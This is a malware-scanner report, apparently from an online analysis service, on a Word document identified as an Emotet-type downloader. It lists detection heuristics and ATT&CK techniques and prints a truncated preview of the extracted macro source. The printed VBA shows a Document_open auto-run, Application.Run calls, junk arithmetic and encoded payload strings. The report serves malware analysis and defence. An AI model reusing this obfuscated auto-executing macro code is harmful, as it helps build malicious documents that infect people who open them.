MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, likely to download and execute a secondary payload. The presence of a 'macros.bas' file further supports this. The ClamAV detection ID 'Doc.Malware.Emodldr-10025032-0' suggests this is a known downloader variant.
Heuristics 6
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45973 bytes |
SHA-256: 7db8722f4a7a6c0422c18b31ece24da2ae0446608ed88742c056a57c2ab80405 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 20 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tfnEPKKcCUufH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
krBzW = 14533 * CDate(75936) * 10000 * 3154 * (iQtwa - Oct(46903)) + JZsYtA / CSng(WDHGp) * 63281 * CSng(HfrrKT)
Application.Run IzEvij + "SjPhiYfVj" + szmMR, Mimtq + kwRodVArUPYblb + zbTAhP
hXlBE = 30410 * CDate(9034) * 74959 * 3062 * (ncPRi - Oct(57447)) + UtYKV / CSng(swATT) * 42256 * CSng(zXjJBz)
End Sub
Attribute VB_Name = "zizNjLJz"
Sub bZVzP(nrJMwt)
DwkRM = 50705 * CDate(31703) * 93005 * 12005 * (iWGmw - Oct(21096)) + KPthZt / CSng(YZUjpz) * 78631 * CSng(NuiAc)
End Sub
Function kwRodVArUPYblb()
On Error Resume Next
oGhWbu = 69157 * CDate(7853) * 58178 * 41082 * (wVZCvA - Oct(93976)) + ijMRi / CSng(nFpRz) * 28114 * CSng(nTjmJ)
zDoLPZZV = OaWmX("pYBjAGMANQA5AGUAYgAyADgAOQBhAGUAYQA1ADgAMgA3ADcAZQAxADEAMgBjADgAMAAxAGUANwA5AGUAYQBlAGMANwAxADkANwAwADMANwBjADIAMwA5ADIAYQBmAGYANwA0ADUAYQA2AGYAOQA4ADYAZQBhADYAMwA5ADEAOABjADEAZQBmADcAMgBhADAAMwBlAGmLrPiQX", CFbnRi - CFbnRi + 3 + CFbnRi - CFbnRi, CFbnRi - CFbnRi + 196 + CFbnRi - CFbnRi)
ZNhzS = 83615 * CDate(80325) * 35746 * 62203 * (cHdYE - Oct(34576)) + bpCRn / CSng(umjGjI) * 3566 * CSng(PmiXww)
aVlpu = 80971 * CDate(25296) * 28090 * 61868 * (HYbiB - Oct(8245)) + hpmaqo / CSng(PmnMh) * 13247 * CSng(miUEH)
jjszSV = OaWmX("EfPCEAOQBiAGYAMQA1ADgAYwA3ADYAOABkADMAMQBkADQANgBkADAAMQA2AGIAYgBjADkANgAxADQAYwA0ADEAYwAzADAAOQBkADkAMQA3AGYAMQA2ADUAZQA2AGMAZQA0ADIANAAxAGYANgBmADtDf", uZomHk - uZomHk + 6 + uZomHk - uZomHk, uZomHk - uZomHk + 143 + uZomHk - uZomHk)
SFzMbL = 74935 * CDate(44945) * 99675 * 9297 * (UAVYt - Oct(76473)) + jhXZIC / CSng(hZJVp) * 13734 * CSng(uNfcrZ)
FtDQE = 531 * CDate(80284) * 22485 * 15461 * (EqcqGs - Oct(96461)) + NBrbGE / CSng(cLLub) * 31097 * CSng(SZNzsR)
IRrnXFXqSA = OaWmX("LPmGYgBjADcAMABhADAAYQAzADMAYwA4ADUAYwBhAGEAMQA1AGIAMAA0ADIAZQA4ADAAZQA4AGIAYQBmAGQAMQA0AIiP", fBqPhd - fBqPhd + 6 + fBqPhd - fBqPhd, fBqPhd - fBqPhd + 84 + fBqPhd - fBqPhd)
jpFlud = 59717 * CDate(85830) * 23019 * 75564 * (wmCPf - Oct(57803)) + wGcoiR / CSng(cPXCdG) * 98888 * CSng(zhLmpM)
tDfKE = 98666 * CDate(47260) * 28703 * 94967 * (HJUIzG - Oct(67814)) + Ynvpkb / CSng(lMcEiN) * 87052 * CSng(wGrHLi)
CFSpTsN = OaWmX("lddBhADYAZQBiADYANgAyAGQAYgAxADAANQBkADIANgBkADIANgA1AGMAMgA4Oo3", ijzYnc - ijzYnc + 4 + ijzYnc - ijzYnc, ijzYnc - ijzYnc + 58 + ijzYnc - ijzYnc)
dqMGL = 55316 * CDate(34485) * 47731 * 77839 * (SJYrHE - Oct(35533)) + kTmvK / CSng(jOVYB) * 15507 * CSng(XHGKFd)
zjzGq = 10205 * CDate(54371) * 83982 * 69154 * (uaizt - Oct(77711)) + sLwXzh / CSng(jvBjw) * 11701 * CSng(JOrKI)
UIfwkS = OaWmX("Y0AzAGMAZgAyAGIAMgA3AGUANwBmADUAMABkADUANQADUuCD", PwTnoY - PwTnoY + 3 + PwTnoY - PwTnoY, PwTnoY - PwTnoY + 41 + PwTnoY - PwTnoY)
vLJKj = 1969 * CDate(89166) * 89009 * 71908 * (aAzXKW - Oct(26864)) + zCqXv / CSng(vvdEl) * 22825 * CSng(olUfjB)
IjnkN = 46733 * CDate(7479) * 26491 * 55051 * (YAGnw - Oct(61914)) + VfmYV / CSng(qIwSZK) * 96264 * CSng(tKlji)
lCGmtjXrXw = OaWmX("MuQazaGYAOQAwAGIAMwAwADgAMwBlAGYAOAA5ADkANQBmADYANAAwAGYANwAzADEANgBmAGUANAA2ADAANwAxAGYAMwA2AGYANABkADMAYgBkADcAYgAzAGIAMwA4AGEAYQAwAGEPa", nwmNwz - nwmNwz + 7 + nwmNwz - nwmNwz, nwmNwz - nwmNwz + 129 + nwmNwz - nwmNwz)
FPuVOf = 42771 * CDate(52637) * 98534 * 22045 * (AJWXic - Oct(64946)) + tzcPFi / CSng(iPfpV) * 12956 * CSng(BzFlQ)
XWJmB = 24524 * CDate(95311) * 71353 * 51740 * (MPUfh - Oct(32616)) + zTuln / CSng(LWMhj) * 79985 * CSng(pomzaY)
nTVFkPJvT = OaWmX("QSroDAANwA5ADkANQA1AGUAYQA4ADkANwA0ADIAZABhADQAMwA2ADMANwAwADcANgAlD", pTOIm - pTOIm + 5 + pTOIm - pTOIm, pTOIm - pTOIm + 61 + pTOIm - pTOIm)
GBCXlD = 75121 * CDate(4716) * 66117 * 80051 * (fTzwEl - Oct(31234)) + GzPpfO / CSng(mTYdWF) * 17827 * CSng(CzRXAk)
mPrzFj = 37692 * CDate(16067) * 85351 * 29835 * (dmFlrn - Oct(44937)) + CHvrQ / CSng(uzSpF) * 47651 * CSng(CHFbFo)
swVXJwbWJFs = OaWmX("HDIANwA1
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.